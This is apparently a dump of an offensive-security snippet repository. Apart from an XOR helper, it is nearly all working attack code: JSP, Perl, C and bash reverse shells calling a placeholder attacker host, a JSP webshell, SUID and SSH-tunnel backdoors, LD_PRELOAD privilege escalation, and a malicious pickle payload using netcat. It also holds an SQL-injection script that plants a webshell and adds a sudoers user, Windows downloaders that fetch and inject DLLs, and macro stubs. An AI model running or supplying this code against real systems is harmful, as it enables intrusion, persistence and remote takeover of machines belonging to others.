122 | if not args.output: 123 | sys.stdout.write(output) 124 | else: 125 | try: 126 | handle = open(args.output, 'w') 127 | handle.write(output) 128 | success(f'wrote decoded vbscript to "{str(args.output)}"') 129 | except Exception as e: 130 | fatal_error(f'{e.message}') 131 | 132 | 133 | if __name__ == '__main__': 134 | main() 135 | -------------------------------------------------------------------------------- /bin/xor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import click 4 | import sys 5 | 6 | 7 | class Convert: 8 | 9 | pass 10 | 11 | 12 | class XOR(Convert): 13 | 14 | def __init__(self, data, is_list): 15 | self.data = self.parse(data, is_list) 16 | 17 | def to_dec(self, val): 18 | return int(val) 19 | 20 | def to_hex(self, val): 21 | return int(val, 16) 22 | 23 | def parse(self, val, is_list): 24 | if is_list: 25 | val = val.split(b',') 26 | func = self.to_hex if b'x' in val[0] else self.to_dec 27 | val = [func(c) for c in val] 28 | else: 29 | val = list(val) 30 | return val 31 | 32 | def convert(self, key): 33 | key = self.parse(key, True) 34 | klen = len(key) 35 | xored = [self.data[i] ^ key[i % klen] for i in range(0, len(self.data))] 36 | return xored 37 | 38 | 39 | @click.command() 40 | @click.option('--data', '-d', type=str, required=False, help='Data argument, reads from stdin if not provided') 41 | @click.option('--key', '-k', type=str, required=True, help='Key as comma separated list of hex or decimal values') 42 | @click.option('--is-list', '-l', default=False, is_flag=True, help='Treat data as comma separated list of hex or decimal values') 43 | @click.option('--truncate', '-t', default=1000, help='Truncate screen output by number of characters') 44 | @click.option('--output', '-o', type=str, required=False, help='Save output to file') 45 | def run(data, key, is_list, truncate, output): 46 | if data is None: 47 | data = sys.stdin.buffer.read() 48 | else: 49 | data = 
data.encode(sys.stdin.encoding) 50 | xor = XOR(data, is_list) 51 | xored = xor.convert(key.encode(sys.stdin.encoding)) 52 | int_output = ','.join([str(c) for c in xored[:truncate]]) 53 | hex_output = ','.join([hex(c) for c in xored[:truncate]]) 54 | click.echo(click.style('Int: ' + int_output + ' [...]', fg='green', bold=True)) 55 | click.echo(click.style('Hex: ' + hex_output + ' [...]', fg='yellow', bold=True)) 56 | click.echo('Length: ' + str(len(xor.data))) 57 | if output is not None: 58 | with open(output, 'wb') as fil: 59 | fil.write(bytes(xored)) 60 | click.echo('Output saved to: ' + output) 61 | 62 | 63 | if __name__ == '__main__': 64 | run() 65 | -------------------------------------------------------------------------------- /snippets/html/smuggling.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /snippets/java/shells/reverse/reverse.jsp: -------------------------------------------------------------------------------- 1 | <%-- Ex. http://192.168.1.1:8080/test.jsp?ip=192.168.1.100&port=8080&shell=/bin/bash --%> 2 | <%@ 3 | page import="java.lang.*, java.util.*, java.io.*, java.net.*" 4 | %> 5 | <%! 
6 | static class StreamConnector extends Thread { 7 | 8 | InputStream is; 9 | OutputStream os; 10 | 11 | StreamConnector(InputStream is, OutputStream os) { 12 | this.is = is; 13 | this.os = os; 14 | } 15 | 16 | public void run() { 17 | 18 | BufferedReader in = null; 19 | BufferedWriter out = null; 20 | 21 | try { 22 | in = new BufferedReader(new InputStreamReader(is)); 23 | out = new BufferedWriter(new OutputStreamWriter(os)); 24 | char buffer[] = new char[8192]; 25 | int lenRead; 26 | while( (lenRead = in.read(buffer, 0, buffer.length)) > 0) { 27 | out.write(buffer, 0, lenRead); 28 | out.flush(); 29 | } 30 | } catch (Exception exc) {} 31 | 32 | try { 33 | if (in != null) { 34 | in.close(); 35 | } 36 | if (out != null) { 37 | out.close(); 38 | } 39 | } catch (Exception exc) {} 40 | } 41 | } 42 | %> 43 | 44 | 45 | 46 | 47 | Test 48 | 49 | 50 |

Test

51 | 52 | 53 | <% 54 | String ip = request.getParameter("ip"); 55 | String port = request.getParameter("port"); 56 | String shell = request.getParameter("shell"); 57 | 58 | if (ip != null && port != null && shell != null) { 59 | try { 60 | Socket sock = new Socket(ip, (new Integer(port)).intValue()); 61 | Process proc = Runtime.getRuntime().exec(shell); 62 | StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream()); 63 | StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream()); 64 | outputConnector.start(); 65 | inputConnector.start(); 66 | } 67 | catch (Exception exc) {} 68 | } 69 | %> -------------------------------------------------------------------------------- /snippets/java/shells/reverse/reverse_bash.java: -------------------------------------------------------------------------------- 1 | String[] cmd = { 2 | "/bin/bash", 3 | "-c", 4 | "exec 5<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done" 5 | }; 6 | Runtime.getRuntime().exec(cmd); 7 | -------------------------------------------------------------------------------- /snippets/java/shells/reverse/reverse_php.java: -------------------------------------------------------------------------------- 1 | String[] cmd = { 2 | "/bin/sh", 3 | "-c", 4 | "/bin/echo '$sock, 1=>$sock, 2=>$sock), $pipes); ?>' > /tmp/.tomcat.pid; php /tmp/.tomcat.pid" 5 | }; 6 | Runtime.getRuntime().exec(cmd); 7 | -------------------------------------------------------------------------------- /snippets/java/shells/web/webshell.jsp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 |
11 | <%@ page import="java.io.*" %> 12 | <% 13 | String cmd = request.getParameter("cmd"); 14 | String OS = System.getProperty("os.name"); 15 | String[] cmdarr; 16 | String output = ""; 17 | if (cmd != null) { 18 | String s = null; 19 | if (OS.startsWith("Windows")) { 20 | cmdarr = new String[] {"cmd", "/c", cmd}; 21 | } 22 | else { 23 | cmdarr = new String[] {"/bin/sh", "-c", cmd}; 24 | } 25 | try { 26 | Process p = Runtime.getRuntime().exec(cmdarr); 27 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 28 | while((s = sI.readLine()) != null) { 29 | output += s.replace("<", "<").replace(">", ">") + "
"; 30 | } 31 | } catch(IOException e) { 32 | e.printStackTrace(); 33 | } 34 | } 35 | %> 36 |
37 |       <%=output %>
39 | 40 | 41 | -------------------------------------------------------------------------------- /snippets/java/utils/jenkins_console.groovy: -------------------------------------------------------------------------------- 1 | def sout = new StringBuffer(), serr = new StringBuffer() 2 | def proc = 'VAR_STRING'.execute() 3 | proc.consumeProcessOutput(sout, serr) 4 | proc.waitForOrKill(1500) 5 | println "out> $sout err> $serr" -------------------------------------------------------------------------------- /snippets/linux/backdoors/ssh_reconnect.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | if ps -ef | grep -v grep | grep VAR_ATTACKER_HOST ; then 4 | exit 0 5 | else 6 | sshpass -p 'VAR_PASSWORD' ssh -f -N -T -R2221:localhost:22 VAR_ATTACKER_HOST -p VAR_ATTACKER_PORT -l VAR_USERNAME >> /dev/null & 7 | fi 8 | -------------------------------------------------------------------------------- /snippets/linux/backdoors/suid_popen.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(void) 8 | { 9 | FILE *p; 10 | char ch; 11 | setresuid(0, 0, 0); 12 | setresgid(0, 0, 0); 13 | setgroups(0, NULL); 14 | p = popen("VAR_STRING", "r"); 15 | if (p == NULL) 16 | return(1); 17 | while ((ch=fgetc(p)) != EOF) 18 | putchar(ch); 19 | pclose(p); 20 | return(0); 21 | } -------------------------------------------------------------------------------- /snippets/linux/backdoors/suid_shell.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(void) 8 | { 9 | setresuid(0, 0, 0); 10 | setresgid(0, 0, 0); 11 | setgroups(0, NULL); 12 | putenv("HISTFILE=/dev/null"); 13 | execl("/bin/bash", "[kswapd0]", "-pi", NULL); 14 | return 0; 15 | } 16 | 
-------------------------------------------------------------------------------- /snippets/linux/maldocs/runner-1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // msfvenom -p linux/x64/meterpreter/reverse_tcp -e x64/zutto_dekiru lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f c 5 | // gcc -z execstack -s runner.c -o runner 6 | 7 | typedef int(*shellcode_t)(); 8 | 9 | int main(int argc, char ** argv) { 10 | 11 | char xor_key = 'X'; 12 | unsigned char buf[] = "\xc\x10[...]\x1a\x8"; 13 | 14 | int arraysize = (int) sizeof(buf); for (int i=0; i < arraysize - 1; i++) { 15 | buf[i] = buf[i] ^ xor_key; 16 | } 17 | 18 | shellcode_t ret = (shellcode_t)buf; 19 | ret(); 20 | } -------------------------------------------------------------------------------- /snippets/linux/shells/bind/udp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python - < 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define REMOTE_ADDR "VAR_ATTACKER_HOST" 9 | #define REMOTE_PORT VAR_ATTACKER_PORT 10 | 11 | int main(int argc, char *argv[]) 12 | { 13 | struct sockaddr_in sa; 14 | int s; 15 | sa.sin_family = AF_INET; 16 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 17 | sa.sin_port = htons(REMOTE_PORT); 18 | s = socket(AF_INET, SOCK_STREAM, 0); 19 | connect(s, (struct sockaddr *)&sa, sizeof(sa)); 20 | dup2(s, 0); 21 | dup2(s, 1); 22 | dup2(s, 2); 23 | execve("/bin/sh", 0, 0); 24 | return 0; 25 | } -------------------------------------------------------------------------------- /snippets/linux/shells/reverse/reverse.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. 
Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | 38 | use strict; 39 | use Socket; 40 | use FileHandle; 41 | use POSIX; 42 | my $VERSION = "1.0"; 43 | 44 | # Where to send the reverse shell. Change these. 
45 | my $ip = 'VAR_ATTACKER_HOST'; 46 | my $port = VAR_ATTACKER_PORT; 47 | 48 | # Options 49 | my $daemon = 1; 50 | my $auth = 0; # 0 means authentication is disabled and any 51 | # source IP can access the reverse shell 52 | my $authorised_client_pattern = qr(^VA\.R\._\.IP$); 53 | 54 | # Declarations 55 | my $global_page = ""; 56 | my $fake_process_name = "/usr/sbin/apache"; 57 | 58 | # Change the process name to be less conspicious 59 | $0 = "[httpd]"; 60 | 61 | # Authenticate based on source IP address if required 62 | if (defined($ENV{'REMOTE_ADDR'})) { 63 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 64 | 65 | if ($auth) { 66 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 67 | cgiprint("ERROR: Your client isn't authorised to view this page"); 68 | cgiexit(); 69 | } 70 | } 71 | } elsif ($auth) { 72 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); 73 | cgiexit(0); 74 | } 75 | 76 | # Background and dissociate from parent process if required 77 | if ($daemon) { 78 | my $pid = fork(); 79 | if ($pid) { 80 | cgiexit(0); # parent exits 81 | } 82 | 83 | setsid(); 84 | chdir('/'); 85 | umask(0); 86 | } 87 | 88 | # Make TCP connection for reverse shell 89 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 90 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 91 | cgiprint("Sent reverse shell to $ip:$port"); 92 | cgiprintpage(); 93 | } else { 94 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 95 | cgiexit(); 96 | } 97 | 98 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 99 | open(STDIN, ">&SOCK"); 100 | open(STDOUT,">&SOCK"); 101 | open(STDERR,">&SOCK"); 102 | $ENV{'HISTFILE'} = '/dev/null'; 103 | system("w;uname -a;id;pwd"); 104 | exec({"/bin/sh"} ($fake_process_name, "-i")); 105 | 106 | # Wrapper around print 107 | sub cgiprint { 108 | my $line = shift; 109 | $line .= "

\n"; 110 | $global_page .= $line; 111 | } 112 | 113 | # Wrapper around exit 114 | sub cgiexit { 115 | cgiprintpage(); 116 | exit 0; # 0 to ensure we don't give a 500 response. 117 | } 118 | 119 | # Form HTTP response using all the messages gathered by cgiprint so far 120 | sub cgiprintpage { 121 | print "Content-Length: " . length($global_page) . "\r 122 | Connection: close\r 123 | Content-Type: text\/html\r\n\r\n" . $global_page; 124 | } 125 | -------------------------------------------------------------------------------- /snippets/linux/utils/bruteforce.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This is a small utility for parallel passwords bruteforcing using 4 | # some tricks in the GNU Linux/bash environment. I wouldn't recommend 5 | # anything above 5k / @tasooshi 6 | 7 | if [[ -z $1 ]]; then 8 | echo "Usage: $0 username passwords.txt" 9 | exit 1 10 | fi 11 | 12 | passwords=($(cat $2)) 13 | SIZE=${#passwords[@]} 14 | TIMEOUT='0.25s' 15 | 16 | for i in ${!passwords[@]}; do 17 | echo -ne "$i / $SIZE\r" 18 | ( echo ${passwords[i]} | timeout $TIMEOUT su - $1 -c 'whoami' 2>/dev/null | grep -ow $1 >/dev/null && echo -e "\n\n$1:${passwords[i]}\n\n" && kill -INT -$$ &) 19 | done 20 | -------------------------------------------------------------------------------- /snippets/linux/utils/ld_preload.c: -------------------------------------------------------------------------------- 1 | /* gcc -fPIC -shared -o pe.so pe.c -nostartfiles */ 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | void _init() { 8 | unsetenv("LD_PRELOAD"); 9 | setgid(0); 10 | setuid(0); 11 | system("/bin/bash"); 12 | } -------------------------------------------------------------------------------- /snippets/linux/utils/persistence.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This is a stub for developing persistence over SSH, using base64-encoded 4 | # 
MySQL UDF (raptor), a simple SQLi to bypass authorization (LOGIN) and 5 | # another SQL vulnerability to plant a remote execution script (STEP_UPLOAD). 6 | 7 | import base64 8 | import requests 9 | import urllib 10 | 11 | 12 | URL_BASE = 'http://VAR_TARGET_HOST/{}' 13 | 14 | EXEC_BASE = '?cmd=/bin/bash -c "{}"' # Path to cmd/webshell 15 | 16 | DIR_BASE = '/tmp/VAR_STRING' # Temporary directory for storing payloads 17 | 18 | LOGIN = { 19 | 'username': '\' or 1=1#', # Authorization bypass 20 | 'password': '', 21 | } 22 | 23 | UPLOAD_FILENAME = 'shell.php' 24 | 25 | USERNAME = 'VAR_USERNAME' 26 | PASSWORD = 'VAR_PASSWORD' 27 | 28 | STEP_UPLOAD = ( 29 | '2 UNION ALL SELECT 1,2,3,4,5,' 30 | # CONCAT(CHAR(60)[...] == 31 | 'CONCAT(CHAR(60),CHAR(63),CHAR(112),CHAR(104),CHAR(112),CHAR(32),CHAR(101),CHAR(99),CHAR(104),CHAR(111),CHAR(32),CHAR(115),CHAR(104),CHAR(101),CHAR(108),CHAR(108),CHAR(95),CHAR(101),CHAR(120),CHAR(101),CHAR(99),CHAR(40),CHAR(36),CHAR(95),CHAR(71),CHAR(69),CHAR(84),CHAR(91),CHAR(39),CHAR(99),CHAR(109),CHAR(100),CHAR(39),CHAR(93),CHAR(41),CHAR(59),CHAR(63),CHAR(62))' 32 | ' INTO DUMPFILE "/var/www/html/{}"'.format(UPLOAD_FILENAME) 33 | ) 34 | 35 | MYSQL_UDF = ( 36 | 'create table foo(line blob);' 37 | 'insert into foo values(load_file(\'{dir}/raptor_udf2.so\'));' 38 | 'select * from foo into dumpfile \'/usr/lib/raptor_udf2.so\';' 39 | 'create function do_system returns integer soname \'raptor_udf2.so\';' 40 | ) 41 | 42 | USER_ADD = ( 43 | 'select do_system(\'echo "{username} ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers\');' 44 | 'select do_system(\'echo "{username}:{password}" | /usr/sbin/chpasswd\');' 45 | ) 46 | 47 | with open('~/.ssh/id_rsa.pub', 'rb') as fil: 48 | ssh_pub = fil.read() 49 | 50 | USER_SSH = ( 51 | 'select do_system(\'echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config\');' 52 | 'select do_system(\'/etc/init.d/sshd restart\');' 53 | 'select do_system(\'mkdir -p /home/{username}/.ssh\');' 54 | 'select do_system(\'echo "' + ssh_pub + '" > 
/home/{username}/.ssh/authorized_keys\');' 55 | 'select do_system(\'chmod 600 /home/{username}/.ssh/authorized_keys\');' 56 | 'select do_system(\'chmod 700 /home/{username}/.ssh\');' 57 | 'select do_system(\'chown -R {username}:{username} /home/{username}\');' 58 | 'select do_system(\'chmod g-w /home/{username}\');' 59 | ) 60 | 61 | STEP_ADDUSER = ( 62 | 63 | # 'exec nohup setsid /bin/bash 0&0 2>&0 &', 64 | 'rm -rf {dir}'.format(dir=DIR_BASE), 65 | 'mkdir {dir}'.format(dir=DIR_BASE), 66 | 67 | # UDF for MySQL 68 | 'echo I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQoNCmVudW0g >> {dir}/src.b64'.format(dir=DIR_BASE), 69 | 'echo SXRlbV9yZXN1bHQge1NUUklOR19SRVNVTFQsIFJFQUxfUkVTVUxULCBJTlRfUkVT >> {dir}/src.b64'.format(dir=DIR_BASE), 70 | 'echo VUxULCBST1dfUkVTVUxUfTsNCg0KdHlwZWRlZiBzdHJ1Y3Qgc3RfdWRmX2FyZ3Mg >> {dir}/src.b64'.format(dir=DIR_BASE), 71 | 'echo ew0KCXVuc2lnbmVkIGludAkJYXJnX2NvdW50Ow0KCWVudW0gSXRlbV9yZXN1bHQJ >> {dir}/src.b64'.format(dir=DIR_BASE), 72 | 'echo KmFyZ190eXBlOw0KCWNoYXIgCQkJKiphcmdzOw0KCXVuc2lnbmVkIGxvbmcJCSps >> {dir}/src.b64'.format(dir=DIR_BASE), 73 | 'echo ZW5ndGhzOw0KCWNoYXIJCQkqbWF5YmVfbnVsbDsNCn0gVURGX0FSR1M7DQoNCnR5 >> {dir}/src.b64'.format(dir=DIR_BASE), 74 | 'echo cGVkZWYgc3RydWN0IHN0X3VkZl9pbml0IHsNCgljaGFyCQkJbWF5YmVfbnVsbDsN >> {dir}/src.b64'.format(dir=DIR_BASE), 75 | 'echo Cgl1bnNpZ25lZCBpbnQJCWRlY2ltYWxzOw0KCXVuc2lnbmVkIGxvbmcgCQltYXhf >> {dir}/src.b64'.format(dir=DIR_BASE), 76 | 'echo bGVuZ3RoOw0KCWNoYXIJCQkqcHRyOw0KCWNoYXIJCQljb25zdF9pdGVtOw0KfSBV >> {dir}/src.b64'.format(dir=DIR_BASE), 77 | 'echo REZfSU5JVDsNCg0KaW50IGRvX3N5c3RlbShVREZfSU5JVCAqaW5pdGlkLCBVREZf >> {dir}/src.b64'.format(dir=DIR_BASE), 78 | 'echo QVJHUyAqYXJncywgY2hhciAqaXNfbnVsbCwgY2hhciAqZXJyb3IpDQp7DQoJaWYg >> {dir}/src.b64'.format(dir=DIR_BASE), 79 | 'echo KGFyZ3MtPmFyZ19jb3VudCAhPSAxKQ0KCQlyZXR1cm4oMCk7DQoNCglzeXN0ZW0o >> {dir}/src.b64'.format(dir=DIR_BASE), 80 | 'echo YXJncy0+YXJnc1swXSk7DQoNCglyZXR1cm4oMCk7DQp9DQoNCmNoYXIgZG9fc3lz >> 
{dir}/src.b64'.format(dir=DIR_BASE), 81 | 'echo dGVtX2luaXQoVURGX0lOSVQgKmluaXRpZCwgVURGX0FSR1MgKmFyZ3MsIGNoYXIg >> {dir}/src.b64'.format(dir=DIR_BASE), 82 | 'echo Km1lc3NhZ2UpDQp7DQoJcmV0dXJuKDApOw0KfQ0K >> {dir}/src.b64'.format(dir=DIR_BASE), 83 | 'cat {dir}/src.b64 | openssl base64 -d >> {dir}/raptor_udf2.c'.format(dir=DIR_BASE), 84 | 'gcc -g -c {dir}/raptor_udf2.c -o {dir}/raptor_udf2.o'.format(dir=DIR_BASE), 85 | 'gcc -g -shared -W1,-soname,raptor_udf2.so -o {dir}/raptor_udf2.so {dir}/raptor_udf2.o -lc'.format(dir=DIR_BASE), 86 | 87 | # MYSQL_UDF 88 | 'echo {sql} >> {dir}/step1.b64'.format( 89 | sql=base64.b64encode(MYSQL_UDF.format(dir=DIR_BASE, username=USERNAME, password=PASSWORD)), 90 | dir=DIR_BASE 91 | ), 92 | 'cat {dir}/step1.b64 | openssl base64 -A -d >> {dir}/step1.sql'.format(dir=DIR_BASE), 93 | 'mysql -f -u root mysql < {dir}/step1.sql'.format(dir=DIR_BASE), 94 | 95 | # USER_ADD 96 | 'echo {sql} >> {dir}/step2.b64'.format( 97 | sql=base64.b64encode(USER_ADD.format(dir=DIR_BASE, username=USERNAME, password=PASSWORD)), 98 | dir=DIR_BASE 99 | ), 100 | 'cat {dir}/step2.b64 | openssl base64 -A -d >> {dir}/step2.sql'.format(dir=DIR_BASE), 101 | 'mysql -f -u root mysql < {dir}/step2.sql'.format(dir=DIR_BASE), 102 | 103 | # USER_SSH 104 | 'echo {sql} >> {dir}/step3.b64'.format( 105 | sql=base64.b64encode(USER_SSH.format(dir=DIR_BASE, username=USERNAME, password=PASSWORD)), 106 | dir=DIR_BASE 107 | ), 108 | 'cat {dir}/step3.b64 | openssl base64 -A -d >> {dir}/step3.sql'.format(dir=DIR_BASE), 109 | 'mysql -f -u root mysql < {dir}/step3.sql'.format(dir=DIR_BASE), 110 | 111 | # Cleanup 112 | 'rm -rf {}'.format(DIR_BASE), 113 | ) 114 | 115 | 116 | with requests.Session() as session: 117 | 118 | print(':: Logging in') 119 | session.post( 120 | URL_BASE.format('index.php'), 121 | data=LOGIN 122 | ) 123 | 124 | print(':: Planting script') 125 | session.get( 126 | URL_BASE.format('edit.php?article=') + STEP_UPLOAD 127 | ) 128 | 129 | print(':: Executing commands') 
130 | for cmd in STEP_ADDUSER: 131 | print(cmd) 132 | session.get( 133 | URL_BASE.format(UPLOAD_FILENAME) + EXEC_BASE.format(urllib.quote(cmd)) 134 | ) 135 | 136 | 137 | print('\nDone') 138 | -------------------------------------------------------------------------------- /snippets/linux/utils/port_scanning1.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host=$1 4 | port_first=1 5 | port_last=65535 6 | 7 | for ((port=$port_first; port<=$port_last; port++)) 8 | do 9 | (echo >/dev/tcp/$host/$port) >/dev/null 2>&1 && echo "$port open" 10 | done -------------------------------------------------------------------------------- /snippets/linux/utils/ps_monitoring.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | IFS=$'\n' 4 | 5 | old_process=$(ps -eo command) 6 | 7 | while true; do 8 | new_process=$(ps -eo command) 9 | diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] 10 | sleep 1 11 | old_process=$new_process 12 | done 13 | -------------------------------------------------------------------------------- /snippets/linux/utils/python_pickle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import pickle 4 | import os 5 | import base64 6 | 7 | 8 | class Payload(): 9 | 10 | def __reduce__(self): 11 | cmd = "rm /tmp/shell; mknod /tmp/shell p; nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT 0/tmp/shell" 12 | return (os.system, (cmd,)) 13 | 14 | 15 | payload = pickle.dumps(Payload()) 16 | print base64.b64encode(payload) 17 | -------------------------------------------------------------------------------- /snippets/linux/utils/so_injection.c: -------------------------------------------------------------------------------- 1 | /* gcc -shared -o expected_path.so -fPIC so_injection.c */ 2 | 3 | #include 4 | #include 5 | 6 | static void inject() __attribute__((constructor)); 7 | 8 | void 
inject(){ 9 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); 10 | } -------------------------------------------------------------------------------- /snippets/php/recursive_dir.php: -------------------------------------------------------------------------------- 1 | "; 17 | } 18 | } 19 | } 20 | closedir($dh); 21 | } 22 | 23 | if(isset($_GET["dir"])) 24 | { 25 | print_r(list_files($_GET["dir"])); 26 | } 27 | 28 | ?> -------------------------------------------------------------------------------- /snippets/python/port_scanning.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from socket import * 4 | 5 | 6 | if __name__ == '__main__': 7 | target = raw_input('Enter host to scan: ') 8 | target_ip = gethostbyname(target) 9 | print 'Starting scan on host ', target_ip 10 | for i in range(20, 1025): 11 | s = socket(AF_INET, SOCK_STREAM) 12 | result = s.connect_ex((target_ip, i)) 13 | if (result == 0): 14 | print 'Port %d: OPEN' % (i,) 15 | s.close() 16 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Threading.Tasks; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | 6 | 7 | // msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f dll -o shell.dll 8 | 9 | 10 | namespace ConsoleApp { 11 | 12 | class Program { 13 | 14 | [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)] 15 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 16 | [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)] 17 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 18 | [DllImport("kernel32.dll")] 19 | static extern 
bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 20 | [DllImport("kernel32.dll")] 21 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 22 | [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)] 23 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 24 | [DllImport("kernel32.dll", CharSet=CharSet.Auto)] 25 | public static extern IntPtr GetModuleHandle(string lpModuleName); 26 | 27 | static void Main(string[] args) 28 | { 29 | String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 30 | String dllName = dir + "\\shell.dll"; 31 | WebClient wc = new WebClient(); 32 | wc.DownloadFile("http://VAR_ATTACKER_HOST/shell.dll", dllName); 33 | Process[] expProc = Process.GetProcessesByName("explorer"); 34 | int pid = expProc[0].Id; 35 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid); 36 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 37 | IntPtr outSize; 38 | Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize); 39 | IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 40 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero); 41 | } 42 | 43 | } 44 | 45 | } 46 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.js: -------------------------------------------------------------------------------- 1 | var url = "https://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/test.doc"; 2 | var req = WScript.CreateObject("MSXML2.ServerXMLHTTP"); 3 | req.open("GET", url, false); 4 | req.setRequestHeader("Pragma", "no-cache"); 5 | req.setRequestHeader("Cache-Control", 
"no-cache,max-age=0"); 6 | req.setRequestHeader("If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT"); 7 | req.send(); 8 | if (req.Status == 200) { 9 | var Stream = WScript.CreateObject("ADODB.Stream"); 10 | Stream.Open(); 11 | Stream.Type = 1; 12 | Stream.Write(req.ResponseBody); 13 | Stream.Position = 0; 14 | Stream.SaveToFile("test.exe", 2); 15 | Stream.Close(); 16 | } 17 | var wsh = new ActiveXObject("WScript.Shell"); 18 | wsh.Run("test.exe"); 19 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.ps1: -------------------------------------------------------------------------------- 1 | IEX (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/Invoke-ReflectivePEInjection.ps1') 2 | $bytes = (New-Object System.Net.WebClient).DownloadData('http://VAR_ATTACKER_HOST/shell.dll') 3 | $procid = (Get-Process -Name explorer).Id 4 | Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid 5 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.vba: -------------------------------------------------------------------------------- 1 | Sub Document_Open() 2 | Init 3 | End Sub 4 | 5 | Sub AutoOpen() 6 | Init 7 | End Sub 8 | 9 | Sub Init() 10 | Dim str As String 11 | Dim shellBin As String 12 | Dim exePath As String 13 | Dim wsh As Object 